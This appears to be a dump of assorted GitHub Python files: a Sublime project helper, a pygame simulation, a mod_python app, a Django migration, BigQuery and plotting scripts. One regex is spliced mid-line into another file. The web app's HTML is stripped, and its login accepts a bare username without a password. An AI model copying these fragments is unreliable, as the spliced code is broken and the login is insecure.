found_all_folders = True\n\n project_file = normalize_path(project_file)\n try:\n with open(project_file, 'r') as fd:\n project_json = json.loads(fd.read(), strict=False)\n\n if 'folders' in project_json:\n project_folders = project_json['folders']\n for directory in view.window().folders():\n found = False\n for folder in project_folders:\n folder_path = normalize_path(folder['path'])\n # handle relative folder paths\n if not os.path.isabs(folder_path):\n folder_path = os.path.normpath(\n os.path.join(os.path.dirname(project_file), folder_path)\n )\n\n if folder_path == directory:\n found = True\n break\n\n if not found:\n found_all_folders = False\n break\n\n if found_all_folders:\n break\n except:\n found_all_folders = False\n except:\n pass\n\n if not found_all_folders:\n project_file = None\n\n if (\n project_file is None or\n not project_file.endswith('.sublime-project') or\n not os.path.exists(project_file)\n ):\n return None\n\n print('Using project file: %s' % project_file)\n return project_file\n\n\n# tokens used to clean-up JSON files\nTOKENIZER = re.compile(r'(? 0: \n car_code.move()\n car_code.draw(screen)\n \n car_formula.moveFormula(velocity, time)\n car_formula.draw(screen)\n\n # 속도 텍스트\n velocity_text = font.render('velocity_code : {}'.format(round(car_code.getVelocity(), 2)), True, BLACK)\n screen.blit(velocity_text, pos_velocity_code)\n formula_text = font.render('velocity_format : {}'.format(round(car_formula.getVelocity(), 2)), True, BLACK)\n screen.blit(formula_text, pos_velocity_formula)\n\n # 변위 텍스트\n velocity_text = font.render('displacement_code : {}'.format(round(car_code.getDisplacement(), 2)), True, BLACK)\n screen.blit(velocity_text, pos_displacement_code)\n formula_text = font.render('displacement_format : {}'.format(round(car_formula.getDisplacement(), 2)), True, BLACK)\n screen.blit(formula_text, pos_displacement_formula)\n\n pygame.display.update()","repo_name":"8BookIt8/Uniformly-Accelerated-Motion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3212333921","text":"from mod_python import util, Session\r\nfrom engine import *\r\nfrom dbase import *\r\n\r\ndef exe(req, **params):\r\n \r\n sess = Session.Session(req)\r\n if not sess.has_key(\"user\"):\r\n util.redirect (req, \"/pantoto-research/login.py\")\r\n user = sess[\"user\"]\r\n\r\n system = getSystem()\r\n pagelet=params[\"pagelet\"]\r\n action=params[\"action\"]\r\n for i in params:\r\n if i[0]=='1':\r\n fieldlabel=i[1:]\r\n value=params[i]\r\n system.setFieldByUser(user,pagelet,fieldlabel,value)\r\n \r\n\r\n system.executeAction(user,action)\r\n\r\n setSystem(system)\r\n util.redirect(req,\"/pantoto-research/runsys.py?pagelet=\"+pagelet)\r\n\r\n\r\n\r\ndef loginverify(req, username):\r\n\r\n sess = Session.Session(req)\r\n sess[\"user\"] = username\r\n sess.save()\r\n util.redirect(req,\"/pantoto-research/runsys.py\")\r\n\r\ndef logout(req):\r\n sess = Session.Session(req)\r\n del sess[\"user\"]\r\n sess.save()\r\n util.redirect (req, \"/pantoto-research/login.py\")\r\n\r\ndef index(req, pagelet=\"\"):\r\n\r\n sess = Session.Session(req)\r\n if not sess.has_key(\"user\"):\r\n util.redirect (req, \"/pantoto-research/login.py\")\r\n user = sess[\"user\"]\r\n system = getSystem()\r\n\r\n pagelets = system.getAllPagelets()\r\n wtop = \"\"\r\n for i in pagelets:\r\n wtop = wtop + '
  • '+i+'
  • \\n'\r\n \r\n if pagelet==\"\":\r\n pagelet=pagelets.keys()[0]\r\n pageletname = pagelet + \" pagelet\"\r\n \r\n\r\n req.content_type = \"text/html\"\r\n req.write( \"\"\"\r\n\r\n\r\n\r\nPantoto-Research\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n
      %s\r\n
    • %s
    • \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n

    %s

    \r\n
    \"\"\" %(wtop, user,pageletname,pagelet))\r\n# req.write(str(system.getCurrentState().getState()))\r\n if pagelet != \"\":\r\n context = system.getUserContent(user,pagelet)\r\n for fieldlabel in context:\r\n req.write(\"\"\"\"\"\" %(fieldlabel))\r\n t=\"\"\r\n if context[fieldlabel][0]=='r':\r\n t = system.getFieldByUser(user,pagelet,fieldlabel)\r\n if t==None:\r\n t=\"\"\r\n if context[fieldlabel][1]=='w':\r\n req.write(\"\"\"\\n\"\"\" %(fieldlabel,fieldlabel,t))\r\n else:\r\n req.write(\"\"\"\\n\"\"\" %(t))\r\n\r\n buttons = system.getExec(user)\r\n\r\n req.write(\"
    \")\r\n for button in buttons:\r\n req.write(\"\"\"
    \\n\"\"\" %(button))\r\n\r\n req.write(\"\"\"\r\n

    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n

    © Pantoto

    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \"\"\" )\r\n","repo_name":"ankur1990/impl","sub_path":"runsys.py","file_name":"runsys.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19095909503","text":"import json\n\nif __name__ == \"__main__\":\n with open(\"complex_total_residue_counts.json\", \"r\") as handle:\n complex_residues = json.load(handle)\n \n planarity = {}\n with open(\"planarity_results.csv\", \"r\") as handle:\n for line in handle:\n line = line.strip(\"\\n\").split(\",\")\n if line[0] != \"5H7I\":\n planarity[line[0]] = line[1]\n\n planars = [complex_residues[comp] for comp in planarity if planarity[comp] == \"planar\"]\n nonplanars = [complex_residues[comp] for comp in planarity if planarity[comp] == \"nonplanar\"]\n \n\n with open(\"residue_counts_by_planarity.csv\", \"w\") as out:\n out.write(\"planars,nonplanars\")\n out.write(\"\\n\")\n for idx, num in enumerate(planars):\n try:\n out.write(\",\".join([str(num), str(nonplanars[idx])]))\n out.write(\"\\n\")\n except IndexError:\n out.write(\",\".join([str(num), \"NA\"]))\n out.write(\"\\n\")\n\n","repo_name":"wigasper/ddi-planarity","sub_path":"data-aggregation/residue_counts_by_planarity.py","file_name":"residue_counts_by_planarity.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19450360040","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('activity_name', models.CharField(max_length=25)),\n ('skill_area', models.CharField(null=True, choices=[('FINANCE', 'Finance'), ('PARENTING', 'Parenting'), ('EMPLOYMENT', 'Employment'), ('FITNESS', 'Fitness')], blank=True, max_length=15)),\n ('month', models.CharField(null=True, choices=[('Jan', 'January'), ('Feb', 'February'), ('Mar', 'March'), ('Apr', 'April'), ('May', 'May'), ('Jun', 'June'), ('Jul', 'July'), ('Aug', 'August'), ('Sep', 'September'), ('Oct', 'October'), ('Nov', 'November'), ('Dec', 'December')], blank=True, max_length=3)),\n ('year', models.PositiveSmallIntegerField(null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Attendance',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('complete_date', models.DateField(null=True, blank=True)),\n ('activity', models.ForeignKey(to='zoom_data.Activity')),\n ],\n ),\n migrations.CreateModel(\n name='Child',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('first_name', models.CharField(null=True, blank=True, max_length=15)),\n ('last_name', models.CharField(null=True, blank=True, max_length=15)),\n ('dob', models.DateField(null=True, blank=True)),\n ('gender', models.CharField(null=True, choices=[('FEMALE', 'Female'), ('MALE', 'Male'), ('ALT', 'Another gender')], blank=True, max_length=6)),\n ('race', models.CharField(null=True, choices=[('AFRICAN_AMERICAN', 'African American'), ('WHITE', 'White'), ('MULTIRACIAL', 'Multiracial'), ('AMER_INDIAN', 'American Indian'), ('PAC_ISLANDER', 'Native Hawaiian or Pacific Islander'), ('ASIAN_AMERICAN', 'Asian American')], blank=True, max_length=16)),\n ('ethnicity', models.CharField(null=True, choices=[('HISPANIC', 'Hispanic'), ('NON-HISPANIC', 'Non-Hispanic')], blank=True, max_length=12)),\n ],\n ),\n migrations.CreateModel(\n name='ChildAttendance',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('complete_date', models.DateField(null=True, blank=True)),\n ('activity', models.ForeignKey(to='zoom_data.Activity')),\n ('child', models.ForeignKey(to='zoom_data.Child')),\n ],\n ),\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('resident_phone', models.CharField(null=True, blank=True, max_length=10)),\n ('resident_email', models.EmailField(null=True, blank=True, max_length=254)),\n ('permission_text', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_photo', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_email', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_call', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_mail', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('permission_facebook', models.CharField(null=True, choices=[('Yes', 'YES'), ('No', 'NO')], blank=True, max_length=3)),\n ('contact_pref', models.CharField(null=True, choices=[('Mail', 'MAIL'), ('Facebook', 'FACEBOOK'), ('Text', 'TEXT'), ('Email', 'EMAIL'), ('Call', 'CALL')], blank=True, max_length=8)),\n ('date_updated', models.DateTimeField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Goal',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('goal_name', models.CharField(max_length=100)),\n ('goal_date', models.DateField(null=True, blank=True)),\n ('goal_explain', models.TextField(blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Household',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('household_name', models.CharField(null=True, blank=True, max_length=20)),\n ('unit_num', models.PositiveSmallIntegerField(null=True, blank=True)),\n ('unit_type', models.CharField(null=True, choices=[('SUPPORTIVE', 'Supportive Housing'), ('MARIF', 'MARIF'), ('STUDIO', 'Studio')], blank=True, max_length=10)),\n ],\n ),\n migrations.CreateModel(\n name='Progress',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('date_progress', models.DateField(help_text='Please use the following format: YYYY-MM-DD.')),\n ('percent_progress', models.CharField(choices=[('less than 25%', 'less than 25%'), ('25%', '25%'), ('50%', '50%'), ('75%', '75%'), ('100%', '100%')], default='less than 25%', blank=True, max_length=13)),\n ('notes_progress', models.TextField(blank=True)),\n ('goal', models.ForeignKey(to='zoom_data.Goal')),\n ],\n ),\n migrations.CreateModel(\n name='Resident',\n fields=[\n ('resident_id', models.AutoField(serialize=False, primary_key=True)),\n ('resident_first_name', models.CharField(max_length=20)),\n ('resident_last_name', models.CharField(max_length=20)),\n ('resident_move_in', models.DateField(help_text='Please use the following format: YYYY-MM-DD.')),\n ('gender', models.CharField(null=True, choices=[('FEMALE', 'Female'), ('MALE', 'Male'), ('ALT', 'Another gender')], blank=True, max_length=6)),\n ('race', models.CharField(null=True, choices=[('AFRICAN_AMERICAN', 'African American'), ('WHITE', 'White'), ('MULTIRACIAL', 'Multiracial'), ('AMER_INDIAN', 'American Indian'), ('PAC_ISLANDER', 'Native Hawaiian or Pacific Islander'), ('ASIAN_AMERICAN', 'Asian American')], blank=True, max_length=16)),\n ('ethnicity', models.CharField(null=True, choices=[('HISPANIC', 'Hispanic'), ('NON-HISPANIC', 'Non-Hispanic')], blank=True, max_length=12)),\n ('health_ins', models.CharField(null=True, choices=[('NONE', 'None'), ('PRIVATE', 'Private'), ('MEDICAID', 'Medicaid'), ('OTHER', 'Other Insurance')], blank=True, max_length=8)),\n ('resident_exit', models.DateField(null=True, help_text='Please use the following format: YYYY-MM-DD.', blank=True)),\n ('household', models.ForeignKey(null=True, to='zoom_data.Household', blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='goal',\n name='goal_resident',\n field=models.ForeignKey(to='zoom_data.Resident'),\n ),\n migrations.AddField(\n model_name='contact',\n name='contact_resident',\n field=models.ForeignKey(to='zoom_data.Resident'),\n ),\n migrations.AddField(\n model_name='child',\n name='household',\n field=models.ForeignKey(null=True, to='zoom_data.Household', blank=True),\n ),\n migrations.AddField(\n model_name='attendance',\n name='resident',\n field=models.ForeignKey(to='zoom_data.Resident'),\n ),\n migrations.AddField(\n model_name='activity',\n name='children',\n field=models.ManyToManyField(through='zoom_data.ChildAttendance', to='zoom_data.Child'),\n ),\n migrations.AddField(\n model_name='activity',\n name='members',\n field=models.ManyToManyField(through='zoom_data.Attendance', to='zoom_data.Resident'),\n ),\n ]\n","repo_name":"5klynna5/zoom_c","sub_path":"zoom_data/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28307454037","text":"def prefixo(p1, p2):\n\tif len(p1) > len(p2):\n\t\treturn False\n\ti = 0\n\twhile i < len(p1):\n\t\tif p1[i] != p2[i]:\n\t\t\treturn False\n\t\ti += 1\n\treturn True\n\ndef ler():\n\tp1 = input('Digite a primeira frase: ').strip()\n\tp2 = input('Digite a segunda frase: ').strip()\n\treturn p1, p2\n\np1, p2 = ler()\nif prefixo(p1, p2):\n\tprint('É substring')\nelse:\n\tprint('Não é substring')","repo_name":"argosmaia/UERJ-python","sub_path":"substrings.py","file_name":"substrings.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70036296052","text":"from IPython.core.interactiveshell import InteractiveShell\nfrom wordcloud import WordCloud, STOPWORDS\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport geopandas\nimport functools\nfrom bokeh.palettes import d3\n\nfrom loguru import logger\nfrom GEN_Utils import FileHandling\nfrom GEN_Utils.HDF5_Utils import hdf_to_dict\n\nlogger.info('Import OK')\n\ninput_path = 'analysis_results/summary_stats/summary_stats.xlsx'\noutput_folder = 'images/'\n\nif not os.path.exists(output_folder):\n os.mkdir(output_folder)\n\n# Print all lone variables during execution\nInteractiveShell.ast_node_interactivity = 'all'\n# Set plotting backgrounds to white\nmatplotlib.rcParams.update(_VSCode_defaultMatplotlib_Params)\nmatplotlib.rcParams.update({'figure.facecolor': (1, 1, 1, 1)})\n\n# Retrieve cleaned data from HDF5\nraw_data = pd.read_excel(input_path, sheetname=None)\nraw_data.keys()\n\nstate_summary = raw_data['state_summary']\nstate_summary = state_summary.drop(\n [col for col in state_summary.columns.tolist() if 'Unnamed' in col], axis=1)\n\n# import spatial data\n# set the filepath and load in a shapefile\ninput_path = 'raw_data/australian_states.geo.json'\nmap_df = geopandas.read_file(input_path)\n# check data type so we can see that this is not a normal dataframe, but a GEOdataframe\nmap_df.head()\n# map_df.plot()\n\n# Clean map df for plotting funding rate\nstate_mapper = {'Australian Capital Territory': 'ACT', 'New South Wales': 'NSW', 'Northern Territory': 'NT', 'Queensland': 'QLD', 'South Australia': 'SA', 'Tasmania': 'TAS', 'Victoria': 'VIC', 'Western Australia': 'WA'}\n\nfor_plotting = map_df.copy()\nfor_plotting['state'] = for_plotting['STATE_NAME'].map(state_mapper)\n\n# Add columns for each year funded rate\nyear_dict = {}\nfor year, df in state_summary.groupby('Year'):\n small_df = df[['State and Territory', 'Funded Rate', 'Funded']]\n small_df['Funded Rate'] = small_df['Funded Rate'] * 100\n small_df.columns = ['state', f'{year}_rate', f'{year}_funded']\n year_dict[year] = small_df\n\nmerged_df = functools.reduce(lambda left, right: pd.merge(left, right, on='state', how='outer'), list(year_dict.values()))\n\nfor_plotting = pd.merge(for_plotting, merged_df, on='state', how='outer')\n\nfor_plotting['coords'] = for_plotting['geometry'].apply(lambda x: x.representative_point().coords[:])\nfor_plotting['coords'] = [coords[0] for coords in for_plotting['coords']]\nfor_plotting.reset_index(inplace=True)\n\noptimised_coords = for_plotting[['state', 'coords']].copy()\noptimised_coords[['x', 'y']] = pd.DataFrame(optimised_coords['coords'].tolist(), index=optimised_coords.index)\noptimised_coords = optimised_coords.set_index('state').drop('coords', axis=1).T\n\noptimised_coords['VIC'] = optimised_coords['VIC'] + [-1, -1]\noptimised_coords['TAS'] = optimised_coords['TAS'] + [-0.5, -0.5]\noptimised_coords['SA'] = optimised_coords['SA'] + [-3, 2]\noptimised_coords['QLD'] = optimised_coords['QLD'] + [0, -2]\noptimised_coords = optimised_coords.T\n\n\n# set the range for the choropleth\nvmin, vmax = 0, 50\n# Set up the plot\n# year = '2016'\nsns.palplot(sns.light_palette('darkblue'))\ncmap = sns.light_palette('darkblue', as_cmap=True)\ncmap='BuGn'\n\nyears = state_summary['Year'].unique()\nfor year in years:\n year\n # create figure and axes for Matplotlib\n fig, ax = plt.subplots(1, figsize=(10, 6))\n for_plotting.plot(column=f'{year}_rate', cmap=cmap, linewidth=0.8, ax=ax, edgecolor='0.8')\n # remove the axis\n ax.axis('off')\n # add a title\n ax.set_title(f'Number of funded applications per state - {year}', loc='left',\n fontdict={'fontsize': 15, 'fontweight': 'bold'})\n # Add annotation for number funded\n for state, row in for_plotting.set_index('state').iterrows():\n plt.annotate(for_plotting.set_index('state').loc[state, f'{year}_funded'], xy=(\n optimised_coords.loc[state, 'x'], optimised_coords.loc[state, 'y']), fontsize=15, fontweight='bold')\n\n # create an annotation for the data source\n # ax.annotate('Source: NHMRC, 2019', xy=(0.1, .08), xycoords='figure fraction',\n # horizontalalignment='left', verticalalignment='top', fontsize=12, color='#555555')\n # ax.annotate(year, xy=(0.15, 0.8), xycoords='figure fraction',\n # horizontalalignment='left', verticalalignment='top', fontsize=15, color='black', style='italic', fontweight='bold')\n\n # Create colorbar as a legend\n sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))\n # empty array for the data range\n sm._A = []\n # add the colorbar to the figure\n cbar = fig.colorbar(sm)\n cbar.set_label('Proportion of applications funded (%)',\n rotation=270, labelpad=20, fontsize=12)\n fig.savefig(f'{output_folder}{year}_per_state.png', dpi=300)\n","repo_name":"dezeraecox/Investigator-Grants-2019","sub_path":"analysis_scripts/plot_states.py","file_name":"plot_states.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42401189955","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# 1. Partial preimages\n# Use a brute-force algorithm to find a partial preimage.\n# Using the template “hash_preimage.py” write a function called “hash_preimage” that takes a single input, target_string, where target_string is a string of bits. The function “hash_preimage” should return a single variable x such that the trailing bits of SHA256(x) matches the target string (not the hash of the target string).\n# Your algorithm should be randomized, i.e., hash_preimage(target_string) should not always return the same partial preimage\n# \n# Example: If our target string was 101 and the hash(x)=01000101 then this would be a match because the least significant bits (rightmost) completely match the target string.\n# \n\n# In[1]:\n\n\nimport hashlib\nimport os\nimport string\nimport random\n\n\n# In[2]:\n\n\ndef randomString(N):\n return ''.join(random.choice(string.ascii_lowercase + ' ') for i in range(N))\n \n\n\n# In[3]:\n\n\ndef hash_preimage(target_string):\n if not all( [x in '01' for x in target_string ] ):\n print( \"Input should be a string of bits\" )\n return\n nonce = b'\\x00'\n \n N=1000000\n n=1000\n k=len(target_string)\n \n x_int = random.randint(1, n)\n msg_bytes = target_string.encode('utf-8')\n \n \n # while True:\n for i in range(N):\n x_int = x_int+1\n x_str = str(x_int)\n x_binary = bin(int(hashlib.sha256(x_str.encode('utf-8')).hexdigest(),16))\n last_k_digits = x_binary[-k:]\n \n if str(last_k_digits) == target_string:\n return(x_str)\n \n return( nonce )\n\n\n# In[4]:\n\n\ntarget_string = \"1011111\"\nmyx = hash_preimage(target_string)\n\n\n# In[8]:\n\n\nbin(int(hashlib.sha256(myx.encode('utf-8')).hexdigest(),16))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ambercyang/mcit582hw2_hash_preimage","sub_path":"hash_preimage.py","file_name":"hash_preimage.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9048743363","text":"from collections import Counter\n\nfrom django.db import models\n\n\nclass GameManager(models.Manager):\n def start_data(self):\n start_actions = Counter()\n start_actions_wins = Counter()\n start_logs = [g.gamelog_set.filter(number=0).first() for g in self.all()]\n for log in start_logs:\n if not log:\n continue\n for line in log.text.split(\"\\n\"):\n if not line.startswith(\"action:\"):\n continue\n _, action = line.split(\":\")\n action = action.strip()\n start_actions[action] += 1\n\n win_gp = log.game.gameplayer_set.filter(winner=True).first()\n if win_gp and win_gp.player == log.player:\n start_actions_wins[action] += 1\n\n print(start_actions)\n print(start_actions_wins)\n for key in start_actions:\n print(key, start_actions_wins[key] / start_actions[key])\n\n second_actions = Counter()\n second_actions_wins = Counter()\n second_logs = [g.gamelog_set.filter(number=1).first() for g in self.all()]\n for log in second_logs:\n if not log:\n continue\n for line in log.text.split(\"\\n\"):\n if not line.startswith(\"action:\"):\n continue\n _, action = line.split(\":\")\n action = action.strip()[:2]\n second_actions[action] += 1\n\n win_gp = log.game.gameplayer_set.filter(winner=True).first()\n if win_gp and win_gp.player == log.player:\n second_actions_wins[action] += 1\n\n print(second_actions)\n print(second_actions_wins)\n for key in second_actions:\n print(key, second_actions_wins[key] / second_actions[key])\n\n\nclass Game(models.Model):\n players = models.ManyToManyField(\"Player\", through=\"GamePlayer\")\n worker = models.ForeignKey(\"Worker\", on_delete=models.PROTECT)\n\n initial_state = models.TextField()\n\n start_timestamp = models.DateTimeField(auto_now_add=True)\n end_timestamp = models.DateTimeField(null=True)\n\n objects = GameManager()\n\n class Status(models.TextChoices):\n IN_PROGRESS = \"I\"\n COMPLETED = \"C\"\n DEPTH_OUT = \"D\"\n ERROR = \"E\"\n ABANDONED = \"A\"\n\n status = models.CharField(\n max_length=1,\n choices=Status.choices,\n default=Status.IN_PROGRESS,\n )\n\n @property\n def start_data(self):\n return {\n \"game_id\": self.id,\n \"players\": [\n {\n \"number\": game_player.number,\n \"id\": game_player.player.id,\n \"repository\": game_player.player.repository,\n \"commit\": game_player.player.commit,\n \"invocation\": game_player.player.invocation,\n }\n for game_player in self.gameplayer_set.order_by(\"number\")\n ],\n \"state\": self.initial_state,\n }\n\n def add_player(self, player):\n GamePlayer.objects.create(game=self, player=player, number=self.players.count())\n\n def max_state_repititions(self):\n states = [log.state for log in self.gamelog_set.all()]\n counts = Counter()\n for state in states:\n counts[state] += 1\n return max(counts.values())\n\n def matchups(self):\n pass\n\n def __str__(self):\n return f\"{self.worker} {self.status} {self.start_timestamp}\"\n\n\nclass GameLog(models.Model):\n game = models.ForeignKey(\"Game\", on_delete=models.CASCADE)\n player = models.ForeignKey(\"Player\", on_delete=models.PROTECT)\n number = models.IntegerField()\n state = models.TextField()\n text = models.TextField()\n\n\nclass GamePlayer(models.Model):\n game = models.ForeignKey(\"Game\", on_delete=models.CASCADE)\n player = models.ForeignKey(\"Player\", on_delete=models.PROTECT)\n\n number = models.IntegerField()\n winner = models.BooleanField(default=False)\n\n def opponent(self):\n return [gp for gp in gameplayer_set.all() if gp != self][0]\n\n def __str__(self):\n return f\"{self.game} player {self.number + 1}\"\n\n\nclass Player(models.Model):\n name = models.TextField(null=True, blank=True)\n repository = models.TextField()\n commit = models.CharField(max_length=40)\n invocation = models.TextField()\n\n def __str__(self):\n return self.name or f\"Player #{self.id}\"\n\n\nclass Request(models.Model):\n player = models.ForeignKey(\n \"Player\", on_delete=models.CASCADE, related_name=\"request_set\"\n )\n opponent = models.ForeignKey(\n \"Player\",\n on_delete=models.CASCADE,\n blank=True,\n null=True,\n related_name=\"request_opponent_set\",\n )\n number = models.IntegerField(default=1)\n\n\nclass Worker(models.Model):\n name = models.TextField()\n first_checkin = models.DateTimeField(auto_now_add=True)\n last_checkin = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.name\n","repo_name":"richardjs/arthur","sub_path":"arthur/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18220906382","text":"class Solution:\n def findMinimumTime(self, tasks: List[List[int]]) -> int:\n kMax = 2000\n running = [False] * (kMax + 1)\n\n # Sort tasks by end.\n for start, end, duration in sorted(tasks, key=lambda x: x[1]):\n neededDuration = duration - \\\n sum(running[i] for i in range(start, end + 1))\n # Greedily run the task as late as possible so that later tasks can run\n # simultaneously.\n i = end\n while neededDuration > 0:\n if not running[i]:\n running[i] = True\n neededDuration -= 1\n i -= 1\n\n return sum(running)\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/2589. Minimum Time to Complete All Tasks/2589.py","file_name":"2589.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"4672928603","text":"import argparse\nimport csv\nimport time\nimport uuid\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom oauth2client.client import GoogleCredentials\n\nquery_template = '''\nSELECT\n stn.id,\n stn.name,\n stn.latitude,\n stn.longitude,\n date,\n MAX(prcp) AS prcp,\n MAX(tmin) AS tmin,\n MAX(tmax) AS tmax\nFROM\n [bigquery-public-data:ghcn_d.ghcnd_stations] as stn\nJOIN\n (SELECT\n id,\n STRING(wx.date) AS date,\n IF (wx.element = 'PRCP', wx.value/10, NULL) AS prcp,\n IF (wx.element = 'TMIN', wx.value/10, NULL) AS tmin,\n IF (wx.element = 'TMAX', wx.value/10, NULL) AS tmax\n FROM\n [bigquery-public-data:ghcn_d.ghcnd_{year}] AS wx\n WHERE\n qflag IS NULL\n AND value IS NOT NULL ) AS wx\nON\n stn.id = wx.id\nWHERE\n latitude > -35 AND latitude < -21\n AND longitude > +15 AND longitude < +35\nGROUP BY\n stn.id,\n stn.name,\n stn.latitude,\n stn.longitude,\n date\nORDER BY\n date;\n'''\n\n\ndef async_query(bigquery,\n project_id,\n query,\n batch=False,\n num_retries=5,\n use_legacy_sql=True):\n job_data = {\n 'jobReference': {\n 'projectId': project_id,\n 'jobId': str(uuid.uuid4())\n },\n 'configuration': {\n 'query': {\n 'query': query,\n 'priority': 'BATCH' if batch else 'INTERACTIVE',\n # Set to False to use standard SQL syntax. See:\n # https://cloud.google.com/bigquery/sql-reference/enabling-standard-sql\n 'useLegacySql': use_legacy_sql\n }\n }\n }\n return bigquery.jobs().insert(\n projectId=project_id, body=job_data).execute(num_retries=num_retries)\n\n\ndef poll_job(bigquery, job):\n \"\"\"Waits for a job to complete.\"\"\"\n\n print('Waiting for job to finish...')\n\n request = bigquery.jobs().get(projectId=job['jobReference']['projectId'],\n jobId=job['jobReference']['jobId'])\n\n while True:\n result = request.execute(num_retries=2)\n\n if result['status']['state'] == 'DONE':\n if 'errorResult' in result['status']:\n raise RuntimeError(result['status']['errorResult'])\n print('Job complete.')\n return\n\n time.sleep(1)\n\n\ndef main(project_id):\n credentials = GoogleCredentials.get_application_default()\n bigquery = build('bigquery', 'v2', credentials=credentials)\n\n for year in range(1850, 2016):\n print(year)\n try:\n query_string = query_template.format(year=year)\n query_job = async_query(bigquery, project_id, query_string)\n\n poll_job(bigquery, query_job)\n\n page_token = None\n filename = 'sa_weather_{year}.csv'.format(year=year)\n with open(filename, 'wb') as csvfile:\n spamwriter = csv.writer(csvfile)\n while True:\n page = bigquery.jobs().getQueryResults(\n pageToken=page_token,\n **query_job['jobReference']).execute(num_retries=2)\n\n for row in page['rows']:\n spamwriter.writerow([field['v'] for field in row['f']])\n\n page_token = page.get('pageToken')\n if not page_token:\n break\n\n except HttpError as err:\n print('Error: {}'.format(err.content))\n raise err\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('project_id', help='Your Google Cloud Project ID.')\n args = parser.parse_args()\n main(args.project_id)\n","repo_name":"StoCon/pycon2016","sub_path":"download_sa_weather.py","file_name":"download_sa_weather.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32434594613","text":"if __name__ == '__main__':\n \"\"\"\n PLEASE NOTE: There are definitely things that could be better about this.\n It's a one-off for a relatively-obscure use-case. Get over it.\n\n All data needed to generate a SQL file goes into the program_data variable.\n Hierarchically, it looks like this:\n {\n 'categories': [\n {\n 'category_name': 'some_name',\n 'search_columns_override': [\n 'some_column_name_1',\n 'some_column_name_2',\n ],\n 'search_terms': [\n 'search_term_1',\n 'search_term_2',\n ],\n }\n ],\n 'search_columns': [\n 'some_column_name_1',\n 'some_column_name_2',\n ],\n 'naked_columns': [\n 'some_column_name_1',\n 'some_column_name_2',\n ],\n 'from': {\n 'from_clause': 'dbo.MyTable1 AS a LEFT OUTER JOIN dbo.MyTable2 AS b ON a.Key = b.Key',\n 'from_table': 'dbo.MyTable1',\n },\n 'where': 'WHERE a.MyColumn = \"something\"',\n }\n\n Definitions:\n categories: One record per search category.\n category_name: This is the name that will be used in the column names; for example: column_name_contains_category_name.\n search_columns_override: A list of columns to 